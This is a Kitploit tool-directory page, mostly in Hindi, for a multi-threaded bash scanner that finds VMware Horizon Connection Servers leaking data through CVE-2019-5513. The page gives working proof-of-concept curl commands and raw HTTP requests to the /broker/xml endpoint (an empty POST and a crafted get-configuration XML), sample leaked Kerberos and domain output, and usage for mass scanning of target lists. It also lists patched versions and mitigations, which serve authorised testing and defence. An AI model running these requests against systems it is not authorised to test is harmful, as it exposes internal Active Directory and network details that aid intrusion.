Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-5513-scanner — The VMWare Horizon Connection Server is often used as an internet-facing gateway to an organization’s virtual desktop environment (VDI). Until recently, most of these installations exposed the Connection Server’s internal name, the gateway’s internal IP address, and the Active Directory domain to unauthenticated attackers. | Kitploit
उपकरण/GitHubGitHub/sudosu01/cve-2019-5513-scanner
ReconnaissanceVulnerability ScannersExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubsudosu01/cve-2019-5513-scanner

CVE-2019-5513-scanner

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

2 महीने पहलेअभी तक समीक्षित नहीं

The VMWare Horizon Connection Server is often used as an internet-facing gateway to an organization’s virtual desktop environment (VDI). Until recently, most of these installations exposed the Connection Server’s internal name, the gateway’s internal IP address, and the Active Directory domain to unauthenticated attackers.

साझा करें

VMware Horizon /broker/xml भेद्यता स्कैनर

Security Bash License

VMware Horizon Connection Server के /broker/xml एंडपॉइंट में अप्रमाणित जानकारी प्रकटीकरण भेद्यताओं का पता लगाने के लिए एक उच्च-प्रदर्शन मल्टी-थ्रेडेड स्कैनर।

📋 अवलोकन

VMware Horizon Connection Server एक XML API एंडपॉइंट (/broker/xml) को उजागर करता है जो प्रमाणीकरण की आवश्यकता के बिना संवेदनशील आंतरिक कॉन्फ़िगरेशन जानकारी लीक कर सकता है। यह स्कैनर दो आक्रमण वैक्टर का परीक्षण करके तेजी से कमजोर सर्वरों की पहचान करता है:

  1. खाली POST बॉडी (शून्य-दिवस खोज) — पूरी तरह से खाली POST अनुरोध भेजता है। सर्वर बिना किसी XML कमांड के कॉन्फ़िगरेशन डेटा लीक करता है।
  2. निर्मित XML (CVE-2019-5513) — प्रलेखित get-configuration XML कमांड का उपयोग करता है।

🔍 भेद्यता विवरण

क्या जानकारी लीक हो सकती है?

root@kitploit:~
<?xml version="1.0" encoding="utf-8"?>
<broker>
    <configuration>
        <broker-service-principal>
            <type>kerberos</type>
            <name>[email protected]</name>
        </broker-service-principal>
        <domain>corporate-domain.example.com</domain>
    </configuration>
</broker>

⚡ विशेषताएं

  • बहुत तेज़ — मल्टी-थ्रेडेड आर्किटेक्चर (डिफ़ॉल्ट 50 समवर्ती थ्रेड)
  • दोहरी प्रोटोकॉल परीक्षण — HTTPS (पोर्ट 443) और HTTP (पोर्ट 80) दोनों का एक साथ परीक्षण करता है
  • दो आक्रमण वैक्टर — खाली POST बॉडी (शून्य-दिवस) + निर्मित XML (CVE-2019-5513) का परीक्षण करता है
  • कम टाइमआउट — प्रति अनुरोध अधिकतम 5 सेकंड, कनेक्शन टाइमआउट 3 सेकंड
  • स्पष्ट आउटपुट — कमजोर होस्ट के लिए पूर्ण XML प्रतिक्रिया के साथ रंग-कोडित परिणाम
  • परिणाम निर्यात — -o विकल्प के साथ सभी निष्कर्षों को फ़ाइल में सहेजें
  • कोई निर्भरता नहीं — केवल curl का उपयोग करता है (अधिकांश सिस्टम पर मानक)

🚀 स्थापना

root@kitploit:~
# Clone the repository
git clone https://github.com/sudosu01/CVE-2019-5513-scanner.git

cd vmware-horizon-scanner

# Make the script executable
chmod +x broker.sh

📖 उपयोग

मूल स्कैन

root@kitploit:~
./broker.sh -d targets.txt

अनुकूलित थ्रेड के साथ स्कैन करें (तेज़)

root@kitploit:~
./broker.sh -d targets.txt -t 100

परिणाम स्कैन करें और सहेजें

root@kitploit:~
./broker.sh -d targets.txt -t 100 -o results.txt

कमांड लाइन विकल्प

विकल्पविवरण
-d <file>आईपी पते/होस्टनामों की सूची वाली इनपुट फ़ाइल (प्रति पंक्ति एक)
-t <num>थ्रेड्स की संख्या (डिफ़ॉल्ट: 50)

इनपुट फ़ाइल प्रारूप (targets.txt)

root@kitploit:~
# Comments start with #
185.171.101.236
192.168.1.100
10.0.0.50
example-vmware.com

📊 उदाहरण आउटपुट

root@kitploit:~
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
   VMware Horizon /broker/xml Vulnerability Scanner
   Multi-Threaded Mode - 50 threads
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[*] Testing: Empty POST (Zero-Day) + Crafted XML (CVE-2019-5513)
[*] Protocols: HTTPS + HTTP (both tested simultaneously)

[*] Scanning 3 hosts...

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] 185.171.101.236 | VULNERABLE | HTTPS | EMPTY_POST
Response:
<?xml version="1.0" encoding="utf-8"?>
<broker>
    <configuration>
        <broker-service-principal>
            <type>kerberos</type>
            <name>TEST-SERVER$@DOMAIN</name>
        </broker-service-principal>
    </configuration>
</broker>
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

[-] 192.168.1.100 | NOT VULNERABLE

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] 10.0.0.50 | VULNERABLE | HTTP | CRAFTED_XML
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[*] SCAN COMPLETE
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
    Total hosts: 3
    Vulnerable: 2
    Not vulnerable: 1
    Time taken: 4 seconds

🔬 Burp Suite के साथ परीक्षण

मैन्युअल परीक्षण के लिए, यहां कच्चे अनुरोध हैं:

परीक्षण 1: खाली POST बॉडी (शून्य-दिवस)

root@kitploit:~
POST /broker/xml HTTP/1.1
Host: target.example.com
Content-Type: text/xml
User-Agent: VMware-Horizon-Client
Content-Length: 0

परीक्षण 2: निर्मित XML (CVE-2019-5513)

root@kitploit:~
POST /broker/xml HTTP/1.1
Host: target.example.com
Content-Type: text/xml
User-Agent: VMware-Horizon-Client
Content-Length: 115

<?xml version='1.0' encoding='UTF-8'?><broker version='10.0'><get-configuration></get-configuration></broker>

📝 PoC curl कमांड्स

खाली POST बॉडी

root@kitploit:~
curl -k -X POST "https://target/broker/xml" \
  -H "Content-Type: text/xml" \
  -H "User-Agent: VMware-Horizon-Client" \
  -d ''

निर्मित XML

root@kitploit:~
curl -k -X POST "https://target/broker/xml" \
  -H "Content-Type: text/xml" \
  -H "User-Agent: VMware-Horizon-Client" \
  --data-binary '<?xml version="1.0" encoding="UTF-8"?><broker version="10.0"><get-configuration></get-configuration></broker>'

🛡️ सुधार

VMware Horizon Connection Server को पैच किए गए संस्करण में अपग्रेड करें:

संस्करणनिर्धारित रिलीज़
7.x7.8 या बाद का
7.5.x7.5.2 या बाद का
6.x6.2.8 या बाद का

अतिरिक्त शमन:

  • /broker/xml एंडपॉइंट तक पहुंच को प्रतिबंधित करने के लिए नेटवर्क एक्सेस नियंत्रण लागू करें
  • इस एंडपॉइंट पर अप्रमाणित अनुरोधों को अवरुद्ध करने के लिए WAF नियमों का उपयोग करें
  • /broker/xml पर संदिग्ध POST अनुरोधों की निगरानी करें

🙏 श्रेय

यह उपकरण निम्नलिखित सुरक्षा शोधकर्ताओं के शोध पर आधारित है:

  • मूल CVE-2019-5513 खोज — Atredis Partners
  • Critical Start के Cory Mathews (स्वतंत्र खोज)

इस उपकरण में शून्य-दिवस की खोज

खाली POST बॉडी आक्रमण वेक्टर अतिरिक्त शोध के दौरान पहचाना गया था। मूल CVE के लिए एक निर्मित XML पेलोड की आवश्यकता थी; यह उपकरण खाली बॉडी विधि का भी परीक्षण करता है, जिसमें कोई पेलोड निर्माण की आवश्यकता नहीं है और इसे निष्पादित करना और भी सरल है।

⚠️ अस्वीकरण

यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है। उन सिस्टमों की अनधिकृत स्कैनिंग जो आपके स्वामित्व में नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है, कानूनों और विनियमों का उल्लंघन कर सकती है। लेखक दुरुपयोग के लिए कोई दायित्व नहीं मानते हैं।

📄 लाइसेंस

MIT License

⭐ समर्थन

यदि आपको यह उपकरण उपयोगी लगता है, तो कृपया इसे GitHub पर एक स्टार दें!

टूल डाउनलोड करें
गुणमान
CVECVE-2019-5513
CVSS स्कोर5.3 (मध्यम)
वेक्टरAV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
प्रभावित उत्पादVMware Horizon Connection Server 7.x before 7.8, 7.5.x before 7.5.2, 6.x before 6.2.8
लीक हुई जानकारीएक्टिव डायरेक्टरी डोमेन नाम, सेवा खाता नाम (मशीन खाता), आंतरिक होस्टनाम, गेटवे आईपी पते
-o <file>परिणाम सहेजने के लिए आउटपुट फ़ाइल
-hसहायता संदेश दिखाएं